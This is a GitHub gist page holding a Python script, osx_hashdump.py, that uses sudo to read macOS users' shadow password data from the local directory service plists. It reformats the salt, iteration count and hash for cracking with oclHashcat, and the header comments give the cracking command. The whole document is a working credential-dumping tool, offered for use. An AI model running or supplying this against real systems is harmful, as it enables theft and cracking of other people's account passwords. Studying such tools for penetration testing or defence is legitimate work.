Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
osx_hashdump.py
#!/usr/bin/python
# extracts OSX user hashes and outputs a format crackable with oclHashcat
# adapted from http://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored
# and https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/
#
# automation of approach by @harmj0y
#
# sudo ./osx_hashdump.py
# ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt
import os, base64
from xml.etree import ElementTree
def getUserHash(userName):
try:
raw = os.popen('sudo defaults read /var/db/dslocal/nodes/Default/users/%s.plist ShadowHashData|tr -dc 0-9a-f|xxd -r -p|plutil -convert xml1 - -o - 2> /dev/null' %(userName)).read()
if len(raw) > 100:
root = ElementTree.fromstring(raw)
children = root[0][1].getchildren()
entropy64 = ''.join(children[1].text.split())
iterations = children[3].text
salt64 = ''.join(children[5].text.split())
entropyRaw = base64.b64decode(entropy64)
entropyHex = entropyRaw.encode("hex")
saltRaw = base64.b64decode(salt64)
saltHex = saltRaw.encode("hex")
return (userName, "ml$%s$%s$%s" %(iterations, saltHex, entropyHex))
except Exception as e:
print "getUserHash() exception: %s" %(e)
pass
userNames = [ plist.split(".")[0] for plist in os.listdir('/var/db/dslocal/nodes/Default/users/') if not plist.startswith('_')]
userHashes = []
for userName in userNames:
userHash = getUserHash(userName)
if(userHash):
userHashes.append(getUserHash(userName))
print userHashes
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.